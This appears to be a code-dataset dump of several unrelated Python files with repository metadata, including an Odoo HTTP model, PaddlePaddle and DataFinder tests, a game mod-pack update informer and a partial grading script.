| 32.477612 | 306 | 0.552849 | 272 | 2,176 | 4.25 | 0.323529 | 0.062284 | 0.088235 | 0.038062 | 0.352941 | 0.313149 | 0.313149 | 0.313149 | 0.313149 | 0.313149 | 0 | 0.010818 | 0.320313 | 2,176 | 66 | 307 | 32.969697 | 0.770791 | 0 | 0 | 0 | 0 | 0.041667 | 0.370864 | 0.080882 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.104167 | null | null | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
491cf38094ed0cb56e1412d6daa74c8867a4538f | 4,103 | py | Python | odoo-13.0/addons/web/models/ir_http.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | 12 | 2021-03-26T08:39:40.000Z | 2022-03-16T02:20:10.000Z | odoo-13.0/addons/web/models/ir_http.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | 13 | 2020-12-20T16:00:21.000Z | 2022-03-14T14:55:30.000Z | odoo-13.0/addons/web/models/ir_http.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | 17 | 2020-08-31T11:18:49.000Z | 2022-02-09T05:57:31.000Z | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import hashlib
import json
from odoo import api, models
from odoo.http import request
from odoo.tools import ustr
from odoo.addons.web.controllers.main import module_boot, HomeStaticTemplateHelpers
import odoo
class Http(models.AbstractModel):
_inherit = 'ir.http'
def webclient_rendering_context(self):
return {
'menu_data': request.env['ir.ui.menu'].load_menus(request.session.debug),
'session_info': self.session_info(),
}
def session_info(self):
user = request.env.user
version_info = odoo.service.common.exp_version()
user_context = request.session.get_context() if request.session.uid else {}
session_info = {
"uid": request.session.uid,
"is_system": user._is_system() if request.session.uid else False,
"is_admin": user._is_admin() if request.session.uid else False,
"user_context": request.session.get_context() if request.session.uid else {},
"db": request.session.db,
"server_version": version_info.get('server_version'),
"server_version_info": version_info.get('server_version_info'),
"name": user.name,
"username": user.login,
"partner_display_name": user.partner_id.display_name,
"company_id": user.company_id.id if request.session.uid else None, # YTI TODO: Remove this from the user context
"partner_id": user.partner_id.id if request.session.uid and user.partner_id else None,
"web.base.url": self.env['ir.config_parameter'].sudo().get_param('web.base.url', default=''),
}
if self.env.user.has_group('base.group_user'):
# the following is only useful in the context of a webclient bootstrapping
# but is still included in some other calls (e.g. '/web/session/authenticate')
# to avoid access errors and unnecessary information, it is only included for users
# with access to the backend ('internal'-type users)
mods = module_boot()
qweb_checksum = HomeStaticTemplateHelpers.get_qweb_templates_checksum(addons=mods, debug=request.session.debug)
lang = user_context.get("lang")
translation_hash = request.env['ir.translation'].get_web_translations_hash(mods, lang)
menu_json_utf8 = json.dumps(request.env['ir.ui.menu'].load_menus(request.session.debug), default=ustr, sort_keys=True).encode()
cache_hashes = {
"load_menus": hashlib.sha1(menu_json_utf8).hexdigest(),
"qweb": qweb_checksum,
"translations": translation_hash,
}
session_info.update({
# current_company should be default_company
"user_companies": {'current_company': (user.company_id.id, user.company_id.name), 'allowed_companies': [(comp.id, comp.name) for comp in user.company_ids]},
"currencies": self.get_currencies(),
"show_effect": True,
"display_switch_company_menu": user.has_group('base.group_multi_company') and len(user.company_ids) > 1,
"cache_hashes": cache_hashes,
})
return session_info
@api.model
def get_frontend_session_info(self):
return {
'is_admin': request.session.uid and self.env.user._is_admin() or False,
'is_system': request.session.uid and self.env.user._is_system() or False,
'is_website_user': request.session.uid and self.env.user._is_public() or False,
'user_id': request.session.uid and self.env.user.id or False,
'is_frontend': True,
}
def get_currencies(self):
Currency = request.env['res.currency']
currencies = Currency.search([]).read(['symbol', 'position', 'decimal_places'])
return {c['id']: {'symbol': c['symbol'], 'position': c['position'], 'digits': [69,c['decimal_places']]} for c in currencies}
| 48.845238 | 172 | 0.6427 | 514 | 4,103 | 4.931907 | 0.319066 | 0.093886 | 0.073767 | 0.04497 | 0.213018 | 0.17357 | 0.133333 | 0.121105 | 0.082051 | 0.082051 | 0 | 0.002244 | 0.239825 | 4,103 | 83 | 173 | 49.433735 | 0.810516 | 0.112844 | 0 | 0.030769 | 0 | 0 | 0.157532 | 0.014046 | 0 | 0 | 0 | 0.012048 | 0 | 1 | 0.061538 | false | 0 | 0.107692 | 0.030769 | 0.261538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4929f7cf615e61de5c4f61ef44c5340e9ac4492a | 3,290 | py | Python | python/paddle/v2/fluid/tests/book/test_understand_sentiment_conv.py | QingshuChen/Paddle | 25a92be3e123ed21fd98c7be6bd7e3a6320756a3 | [
"Apache-2.0"
] | null | null | null | python/paddle/v2/fluid/tests/book/test_understand_sentiment_conv.py | QingshuChen/Paddle | 25a92be3e123ed21fd98c7be6bd7e3a6320756a3 | [
"Apache-2.0"
] | 9 | 2017-09-13T07:39:31.000Z | 2017-10-18T05:58:23.000Z | python/paddle/v2/fluid/tests/book/test_understand_sentiment_conv.py | QingshuChen/Paddle | 25a92be3e123ed21fd98c7be6bd7e3a6320756a3 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import paddle.v2 as paddle
import paddle.v2.fluid.core as core
import paddle.v2.fluid.evaluator as evaluator
import paddle.v2.fluid.framework as framework
import paddle.v2.fluid.layers as layers
import paddle.v2.fluid.nets as nets
from paddle.v2.fluid.executor import Executor
from paddle.v2.fluid.optimizer import AdamOptimizer
def convolution_net(input_dim, class_dim=2, emb_dim=32, hid_dim=32):
data = layers.data(name="words", shape=[1], data_type="int64")
label = layers.data(name="label", shape=[1], data_type="int64")
emb = layers.embedding(input=data, size=[input_dim, emb_dim])
conv_3 = nets.sequence_conv_pool(
input=emb,
num_filters=hid_dim,
filter_size=3,
act="tanh",
pool_type="sqrt")
conv_4 = nets.sequence_conv_pool(
input=emb,
num_filters=hid_dim,
filter_size=4,
act="tanh",
pool_type="sqrt")
prediction = layers.fc(input=[conv_3, conv_4],
size=class_dim,
act="softmax")
cost = layers.cross_entropy(input=prediction, label=label)
avg_cost = layers.mean(x=cost)
adam_optimizer = AdamOptimizer(learning_rate=0.002)
opts = adam_optimizer.minimize(avg_cost)
accuracy, acc_out = evaluator.accuracy(input=prediction, label=label)
return avg_cost, accuracy, acc_out
def to_lodtensor(data, place):
seq_lens = [len(seq) for seq in data]
cur_len = 0
lod = [cur_len]
for l in seq_lens:
cur_len += l
lod.append(cur_len)
flattened_data = np.concatenate(data, axis=0).astype("int64")
flattened_data = flattened_data.reshape([len(flattened_data), 1])
res = core.LoDTensor()
res.set(flattened_data, place)
res.set_lod([lod])
return res
def main():
BATCH_SIZE = 100
PASS_NUM = 5
word_dict = paddle.dataset.imdb.word_dict()
dict_dim = len(word_dict)
class_dim = 2
cost, accuracy, acc_out = convolution_net(
input_dim=dict_dim, class_dim=class_dim)
train_data = paddle.batch(
paddle.reader.shuffle(
paddle.dataset.imdb.train(word_dict), buf_size=1000),
batch_size=BATCH_SIZE)
place = core.CPUPlace()
exe = Executor(place)
exe.run(framework.default_startup_program())
for pass_id in xrange(PASS_NUM):
accuracy.reset(exe)
for data in train_data():
tensor_words = to_lodtensor(map(lambda x: x[0], data), place)
label = np.array(map(lambda x: x[1], data)).astype("int64")
label = label.reshape([BATCH_SIZE, 1])
tensor_label = core.LoDTensor()
tensor_label.set(label, place)
outs = exe.run(framework.default_main_program(),
feed={"words": tensor_words,
"label": tensor_label},
fetch_list=[cost, acc_out])
cost_val = np.array(outs[0])
acc_val = np.array(outs[1])
pass_acc = accuracy.eval(exe)
print("cost=" + str(cost_val) + " acc=" + str(acc_val) +
" pass_acc=" + str(pass_acc))
if cost_val < 1.0 and pass_acc > 0.8:
exit(0)
exit(1)
if __name__ == '__main__':
main()
| 32.254902 | 73 | 0.620669 | 449 | 3,290 | 4.327394 | 0.278396 | 0.032939 | 0.046835 | 0.048893 | 0.116315 | 0.055584 | 0.055584 | 0.055584 | 0.055584 | 0.055584 | 0 | 0.023112 | 0.263526 | 3,290 | 101 | 74 | 32.574257 | 0.778787 | 0 | 0 | 0.095238 | 0 | 0 | 0.02766 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0.059524 | 0.107143 | 0 | 0.166667 | 0.011905 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
493212d8687f50b52ca98a00b02e9f83e3d17403 | 247 | py | Python | examples/simple/regression/sample_skipped.py | jonwesneski/end2 | 708c7b96c1086959565e2889a0818451e6e2c931 | [
"MIT"
] | null | null | null | examples/simple/regression/sample_skipped.py | jonwesneski/end2 | 708c7b96c1086959565e2889a0818451e6e2c931 | [
"MIT"
] | 1 | 2022-03-12T19:43:00.000Z | 2022-03-12T19:43:00.000Z | examples/simple/regression/sample_skipped.py | jonwesneski/end2 | 708c7b96c1086959565e2889a0818451e6e2c931 | [
"MIT"
] | null | null | null | from src import (
RunMode,
setup
)
__run_mode__ = RunMode.PARALLEL
@setup
def my_setup(logger):
assert False, "FAILING SETUP ON PURPOSE"
def test_skipped(logger):
assert False, "THIS TEST SHOULD NOT RUN BECAUSE SETUP FAILED"
| 14.529412 | 65 | 0.712551 | 34 | 247 | 4.970588 | 0.676471 | 0.142012 | 0.201183 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.214575 | 247 | 16 | 66 | 15.4375 | 0.871134 | 0 | 0 | 0 | 0 | 0 | 0.279352 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
49373d99cd60462ee40755d32e9fd17e9129e6bd | 478 | py | Python | jessie_bot/help/help.py | KNNCreative/jessie-bot | de6994b6a58b742f1e943cdfbd84af6c0c183851 | [
"MIT"
] | 1 | 2017-08-06T06:08:29.000Z | 2017-08-06T06:08:29.000Z | jessie_bot/help/help.py | KNNCreative/jessie-bot | de6994b6a58b742f1e943cdfbd84af6c0c183851 | [
"MIT"
] | null | null | null | jessie_bot/help/help.py | KNNCreative/jessie-bot | de6994b6a58b742f1e943cdfbd84af6c0c183851 | [
"MIT"
] | null | null | null | import json
import logging
from pathlib import Path
from hermes.common.lex_utils import success, error
logger = logging.getLogger(__name__)
script_path = Path.cwd().joinpath('hermes/help/script.json')
with script_path.open() as f: script = json.load(f)
def handler(event, context):
help_text = '\n'.join(script['help_text'])
return success(message=help_text)
if __name__ == '__main__':
res = handler(event={}, context={})
print(json.dumps(res, indent=3)) | 22.761905 | 60 | 0.719665 | 68 | 478 | 4.794118 | 0.588235 | 0.07362 | 0.116564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002433 | 0.140167 | 478 | 21 | 61 | 22.761905 | 0.790754 | 0 | 0 | 0 | 0 | 0 | 0.087683 | 0.048017 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.307692 | 0 | 0.461538 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
49389ecac90c405c9c35bd0a48479aa66ba8e1c6 | 9,086 | py | Python | mod_modPackInformer/source/mod_modPackInformer.py | stealthz67/spoter-mods-1 | 4ebd859fbb705b085ae5c4cb621edfbab476e378 | [
"WTFPL"
] | null | null | null | mod_modPackInformer/source/mod_modPackInformer.py | stealthz67/spoter-mods-1 | 4ebd859fbb705b085ae5c4cb621edfbab476e378 | [
"WTFPL"
] | null | null | null | mod_modPackInformer/source/mod_modPackInformer.py | stealthz67/spoter-mods-1 | 4ebd859fbb705b085ae5c4cb621edfbab476e378 | [
"WTFPL"
] | 1 | 2019-12-10T19:11:55.000Z | 2019-12-10T19:11:55.000Z | # -*- coding: utf-8 -*-
import json
import os
import threading
import urllib
import urllib2
import BigWorld
import ResMgr
from gui.Scaleform.daapi.view.dialogs import DIALOG_BUTTON_ID, ConfirmDialogButtons, SimpleDialogMeta
from gui.Scaleform.daapi.view.lobby.LobbyView import LobbyView
from gui import DialogsInterface, SystemMessages, makeHtmlString
from notification.NotificationListView import NotificationListView
from constants import AUTH_REALM
from helpers import getLanguageCode
from adisp import process
from gui.Scaleform.daapi.view.common.BaseTicker import BaseTicker
from helpers import dependency
from skeletons.gui.game_control import IBrowserController, IExternalLinksController
class Config(object):
def __init__(self):
self.data = {
'version' : '',
'name' : '',
'serverMain' : '',
'serverBackup' : '',
'statistic' : False,
'statisticTid' : '',
'openLinkInGameBrowser': False
}
xml = ResMgr.openSection('scripts/client/gui/mods/mod_modPackInformer.xml')
if xml is not None:
self.data['version'] = '%s' % xml.readString('version', '')
self.data['name'] = '%s' % xml.readString('name', '')
self.data['serverMain'] = '%s' % xml.readString('serverMain', '')
self.data['serverBackup'] = '%s' % xml.readString('serverBackup', '')
self.data['statistic'] = xml.readBool('statistic', False)
self.data['statisticTid'] = '%s' % xml.readString('statisticTid', '')
self.data['openLinkInGameBrowser'] = xml.readBool('openLinkInGameBrowser', False)
class Updater(object):
def __init__(self):
self.show = True
self.count = 0
self.lin1 = ''
def start(self):
if not updater.show: return
try:
f = urllib2.urlopen(config.data['serverMain'])
except StandardError:
f = None
if f is None or f.getcode() is not 200:
try:
f = urllib2.urlopen(config.data['serverBackup'])
except StandardError:
f = None
if f is not None and f.getcode() is 200:
mod_text = ''
json_text = json.loads(f.read().decode('utf-8-sig'))
if config.data['version'] != '%s' % json_text['version']:
self.show = False
if json_text['header']:
mod_text += '%s' % json_text['header'].format(**json_text)
if json_text['image']:
try:
image = 'img://gui/html/%s' % json_text['imageName']
path = os.path.realpath(os.path.join('./res/gui/html', '%s' % json_text['imageName']))
if not os.path.exists(path):
urllib.urlretrieve('%s' % json_text['imageLink'], path)
except StandardError:
image = ''
path = ''
if image and path and os.path.exists(path):
mod_text += '<br/><img src=\"%s\" width=\"%s\" height=\"%s\">' % (image, json_text['imageWidth'], json_text['imageHeight'])
if json_text['message']:
mod_text += '<br/>%s' % json_text['message'].format(**json_text)
self.lin1 = '%s' % json_text['link']
DialogsInterface.showDialog(SimpleDialogMeta(json_text['windowName'], mod_text, ConfirmDialogButtons(json_text['buttonNameOpen'], json_text['buttonNameClose']), None), self.click)
link = makeHtmlString('html_templates:lobby/system_messages', 'link', {
'text' : '%s' % json_text['messageLinkName'],
'linkType': '%s' % self.lin1
})
p__msg = '%s<br><br>' % json_text['header'].format(**json_text)
p__msg += '<font color="#E2D2A2" size="15"><b>%s</b></font>' % link
SystemMessages.pushMessage(p__msg, SystemMessages.SM_TYPE.GameGreeting)
def click(self, isConfirmed):
if isConfirmed and self.lin1:
if self.lin1.lower().startswith('http:') or self.lin1.lower().startswith('https:'):
if config.data['openLinkInGameBrowser']:
browser.open(self.lin1)
else:
BigWorld.wg_openWebBrowser(self.lin1)
def openLink(self, action):
if self.lin1 is None or self.lin1 == '': return
if self.lin1 in action:
self.click(True)
class Statistics(object):
def __init__(self):
self.analytics_started = False
self.thread_analytics = None
self.user = None
self.old_user = None
def analytics_start(self):
if not self.analytics_started:
lang = str(getLanguageCode()).upper()
param = urllib.urlencode({
'v' : 1, # Version.
'tid': config.data['statisticTid'],
'cid': self.user, # Anonymous Client ID.
't' : 'screenview', # Screenview hit type.
'an' : 'modPackInformer "%s"' % config.data['name'], # App name.
'av' : 'modPackInformer "%s" %s' % (config.data['name'], config.data['version']),
'cd' : 'Cluster: [%s], lang: [%s]' % (AUTH_REALM, lang), # Screen name / content description.
'ul' : '%s' % lang,
'sc' : 'start'
})
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = True
self.old_user = BigWorld.player().databaseID
def start(self):
player = BigWorld.player()
if self.user and self.user != player.databaseID:
self.old_user = player.databaseID
self.thread_analytics = threading.Thread(target=self.end, name='Thread')
self.thread_analytics.start()
self.user = player.databaseID
self.thread_analytics = threading.Thread(target=self.analytics_start, name='Thread')
self.thread_analytics.start()
def end(self):
if self.analytics_started:
lang = str(getLanguageCode()).upper()
param = urllib.urlencode({
'v' : 1, # Version.
'tid': config.data['statisticTid'],
'cid': self.user, # Anonymous Client ID.
't' : 'screenview', # Screenview hit type.
'an' : 'modPackInformer "%s"' % config.data['name'], # App name.
'av' : 'modPackInformer "%s" %s' % (config.data['name'], config.data['version']),
'cd' : 'Cluster: [%s], lang: [%s]' % (AUTH_REALM, lang), # Screen name / content description.
'ul' : '%s' % lang,
'sc' : 'end'
})
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = False
class p__Browser(BaseTicker):
externalBrowser = dependency.descriptor(IExternalLinksController)
internalBrowser = dependency.descriptor(IBrowserController)
def __init__(self):
super(p__Browser, self).__init__()
self.__browserID = 'modPackInformer'
return
def _dispose(self):
self.__browserID = 'modPackInformer'
super(p__Browser, self)._dispose()
return
def open(self, link, internal=True):
if internal:
if self.internalBrowser is not None:
self.__showInternalBrowser(link)
else:
self.__showExternalBrowser(link)
else:
self.__showExternalBrowser(link)
return
@process
def __showInternalBrowser(self, link):
self.__browserID = yield self.internalBrowser.load(url=link, browserID=self.__browserID)
def __showExternalBrowser(self, link):
if self.externalBrowser is not None:
self.externalBrowser.open(link)
def hookedGetLabels(self):
return [{
'id' : DIALOG_BUTTON_ID.SUBMIT,
'label' : self._submit,
'focused': True
}, {
'id' : DIALOG_BUTTON_ID.CLOSE,
'label' : self._close,
'focused': False
}]
def hookedLobbyPopulate(self):
hookLobbyPopulate(self)
start = threading.Thread(target=updater.start, name='updater.start')
start.start()
if config.data['statistic']:
stat.start()
def hookedOnClickAction(*args):
updater.openLink(args[3])
hookOnClickAction(*args)
def init():
print '[LOAD_MOD]: [modPackInformer, by spoter]'
def fini():
stat.end()
config = Config()
browser = p__Browser()
updater = Updater()
stat = Statistics()
ConfirmDialogButtons.getLabels = hookedGetLabels
hookLobbyPopulate = LobbyView._populate
LobbyView._populate = hookedLobbyPopulate
hookOnClickAction = NotificationListView.onClickAction
NotificationListView.onClickAction = hookedOnClickAction
| 38.5 | 195 | 0.575171 | 907 | 9,086 | 5.636163 | 0.242558 | 0.032864 | 0.014085 | 0.011737 | 0.281299 | 0.235133 | 0.190141 | 0.178795 | 0.178795 | 0.178795 | 0 | 0.005153 | 0.295179 | 9,086 | 235 | 196 | 38.66383 | 0.792942 | 0.023443 | 0 | 0.266332 | 0 | 0 | 0.133521 | 0.021783 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.085427 | null | null | 0.005025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4945214eb5cf61ec5b89774833abf449ace18614 | 7,845 | py | Python | test/unittest/datafinder_test/persistence/metadata/value_mapping/custom_format_test.py | schlauch/DataFinder | 958fda4f3064f9f6b2034da396a20ac9d9abd52f | [
"BSD-3-Clause"
] | 9 | 2016-05-25T06:12:52.000Z | 2021-04-30T07:22:48.000Z | test/unittest/datafinder_test/persistence/metadata/value_mapping/custom_format_test.py | schlauch/DataFinder | 958fda4f3064f9f6b2034da396a20ac9d9abd52f | [
"BSD-3-Clause"
] | 6 | 2016-03-29T13:38:18.000Z | 2017-01-18T15:57:42.000Z | test/unittest/datafinder_test/persistence/metadata/value_mapping/custom_format_test.py | schlauch/DataFinder | 958fda4f3064f9f6b2034da396a20ac9d9abd52f | [
"BSD-3-Clause"
] | 7 | 2016-06-15T12:01:22.000Z | 2022-03-05T08:50:25.000Z | # $Filename$
# $Authors$
# Last Changed: $Date$ $Committer$ $Revision-Id$
#
# Copyright (c) 2003-2011, German Aerospace Center (DLR)
#
# All rights reserved.
#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions are
#
#met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of the German Aerospace Center nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
#A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
#OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
#SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
#LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
#DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
#THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
#OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Implements test cases for the custom meta data persistence format.
"""
from datetime import datetime
import decimal
import sys
import unicodedata
import unittest
from datafinder.persistence.error import PersistenceError
from datafinder.persistence.metadata.value_mapping import\
MetadataValue, getPersistenceRepresentation
__version__ = "$Revision-Id$"
_AE = unicodedata.lookup("LATIN SMALL LETTER A WITH DIAERESIS")
class MetadataValueTestCase(unittest.TestCase):
def testInvalidPersistenceValue(self):
self.assertRaises(PersistenceError, MetadataValue, None)
def testComparison(self):
self.assertEquals(MetadataValue("a"), MetadataValue("a"))
self.assertEquals(hash(MetadataValue("a")),
hash(MetadataValue("a")))
self.assertNotEquals(MetadataValue("a"), MetadataValue("b"))
self.assertNotEquals(hash(MetadataValue("a")),
hash(MetadataValue("b")))
self.assertNotEquals(MetadataValue("a"), None)
self.assertNotEquals(hash(MetadataValue("a")), hash(None))
def testRepresentation(self):
self.assertEquals(str(MetadataValue("a")), "'a'")
def testBoolValue(self):
self.assertTrue(MetadataValue("1").value)
self.assertFalse(MetadataValue("0").value)
def testStringValue(self):
self.assertEquals(MetadataValue(u"test").value, u"test")
self.assertEquals(MetadataValue("test").value, "test")
# Special escaped sequences
self.assertEquals(MetadataValue("\\____EMPTY____LIST____").value,
"____EMPTY____LIST____")
self.assertEquals(MetadataValue("\\;").value, ";")
def testNumericValue(self):
self.assertEquals(MetadataValue(u"4.5").value, decimal.Decimal("4.5"))
self.assertEquals(MetadataValue(u"5").value, decimal.Decimal("5"))
def testDatetimeValue(self):
# From time stamp
metdataValue = MetadataValue("0", expectedType=datetime)
self.assertEquals(metdataValue.value, datetime(1970, 1, 1, 1, 0))
# From RFC 822.
persistedValue = u"Wed, 02 Oct 2002 13:00:00 GMT"
metdataValue = MetadataValue(persistedValue)
self.assertEquals(metdataValue.value, datetime(2002, 10, 2, 15, 0))
# From Iso8601.
persistedValue = u"2006-10-16T08:19:39Z"
metdataValue = MetadataValue(persistedValue)
self.assertEquals(metdataValue.value, datetime(2006, 10, 16, 10, 19, 39))
def testListValue(self):
# Success
self.assertEquals(MetadataValue("a;b;1").value,
["a", "b", decimal.Decimal(1)])
# Special cases
persistedValue = u"____EMPTY____LIST____"
metdataValue = MetadataValue(persistedValue)
self.assertEquals(metdataValue.value, list())
self.assertEquals(MetadataValue(";").value, ";")
self.assertEquals(MetadataValue("a\\;b;c").value, ["a;b", "c"])
def testDictValues(self):
metdataValue = MetadataValue("{}")
self.assertEquals(metdataValue.value, dict())
def testGuessRepresentation(self):
# Success
self.assertEquals(MetadataValue("").guessRepresentation(), [None])
self.assertEquals(MetadataValue("1").guessRepresentation(),
[True, decimal.Decimal("1"),
datetime(1970, 1, 1, 1, 0, 1), u"1"])
class GetPersistenceRepresentationTestCase(unittest.TestCase):
def testBoolValue(self):
self.assertEquals(getPersistenceRepresentation(True), "1")
self.assertEquals(getPersistenceRepresentation(False), "0")
def testNoneValue(self):
self.assertEquals(getPersistenceRepresentation(None), "")
self.assertRaises(PersistenceError, getPersistenceRepresentation, tuple())
def testStringValue(self):
self.assertEquals(getPersistenceRepresentation(u"test"), u"test")
self.assertEquals(getPersistenceRepresentation("test"), u"test")
# Special escaped sequences
self.assertEquals(getPersistenceRepresentation(";"), "\\;")
self.assertEquals(getPersistenceRepresentation("____EMPTY____LIST____"),
"\\____EMPTY____LIST____")
# Invalid raw string
orignalFunction = sys.getdefaultencoding
sys.getdefaultencoding = lambda: None # Mock encoding determination
try:
self.assertRaises(
PersistenceError, getPersistenceRepresentation, _AE.encode("Latin-1)"))
finally:
sys.getdefaultencoding = orignalFunction
def testNumericValue(self):
# Decimals
persistedValue = decimal.Decimal("4.5")
self.assertEquals(getPersistenceRepresentation(persistedValue), u"4.5")
persistedValue = decimal.Decimal("5")
self.assertEquals(getPersistenceRepresentation(persistedValue), u"5")
# Raw integer
self.assertEquals(getPersistenceRepresentation(5), u"5")
#Raw float
self.assertEquals(getPersistenceRepresentation(4.5), u"4.5")
def testDatetimeValue(self):
persistedValue = datetime(2006, 10, 16, 10, 19, 39)
self.assertEquals(getPersistenceRepresentation(persistedValue),
u"2006-10-16T08:19:39Z")
def testListValue(self):
persistedValue = [decimal.Decimal("2006"), decimal.Decimal("10"),
decimal.Decimal("16"), decimal.Decimal("10")]
self.assertEquals(getPersistenceRepresentation(persistedValue),
u"2006;10;16;10;")
persistedValue = list()
self.assertEquals(getPersistenceRepresentation(persistedValue),
u"____EMPTY____LIST____")
def testDictValue(self):
self.assertEquals(getPersistenceRepresentation(dict()), u"{}")
| 42.405405 | 88 | 0.653792 | 757 | 7,845 | 6.67107 | 0.321004 | 0.107723 | 0.130693 | 0.032673 | 0.285743 | 0.186535 | 0.113861 | 0.058614 | 0.026931 | 0.026931 | 0 | 0.026835 | 0.244742 | 7,845 | 184 | 89 | 42.63587 | 0.825485 | 0.236966 | 0 | 0.156863 | 0 | 0 | 0.067003 | 0.022624 | 0 | 0 | 0 | 0 | 0.421569 | 1 | 0.166667 | false | 0 | 0.068627 | 0 | 0.254902 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
49477b4b9fb8484c659b6dfe9a98235bbdb4b218 | 3,629 | py | Python | programmers/kakao2022/kakao2022/grader.py | jiyolla/StudyForCodingTestWithDongbinNa | c070829dd9c7b02b139e56511832c4a3b9f5982f | [
"MIT"
] | null | null | null | programmers/kakao2022/kakao2022/grader.py | jiyolla/StudyForCodingTestWithDongbinNa | c070829dd9c7b02b139e56511832c4a3b9f5982f | [
"MIT"
] | null | null | null | programmers/kakao2022/kakao2022/grader.py | jiyolla/StudyForCodingTestWithDongbinNa | c070829dd9c7b02b139e56511832c4a3b9f5982f | [
"MIT"
] | null | null | null | import random
from .api import put_change_grade
# grades[id] = grade for user #{id}.
# grades[0] is not used. Since user id starts from 1.
def change_grade_randomshuffle(grades):
changed_users_id = set(range(len(grades)))
changed_users_id.remove(0)
grades = list(range(len(grades)))
random.shuffle(grades)
commands = []
for changed_user_id in changed_users_id:
commands.append({'id': changed_user_id, 'grade': grades[changed_user_id]})
put_change_grade(commands)
def change_grade_simplelinear(grades, game_results):
MAX_TAKEN = 40
changed_users_id = set()
for game_result in game_results:
changed_users_id.add(game_result['win'])
changed_users_id.add(game_result['lose'])
grades[game_result['win']] += MAX_TAKEN - game_result['taken']
grades[game_result['lose']] -= MAX_TAKEN - game_result['taken']
commands = []
for changed_user_id in changed_users_id:
commands.append({'id': changed_user_id, 'grade': grades[changed_user_id]})
put_change_grade(commands)
def change_grade_discountedlinear(grades, game_results):
BASE_SCORE = 100
MIN_TAKEN = 3
MAX_TAKEN = 40
changed_users_id = set()
for game_result in game_results:
changed_users_id.add(game_result['win'])
changed_users_id.add(game_result['lose'])
